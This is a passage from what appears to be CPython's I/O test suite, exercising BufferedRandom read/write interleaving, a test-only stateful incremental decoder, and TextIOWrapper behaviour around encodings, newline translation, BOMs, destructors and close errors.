b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
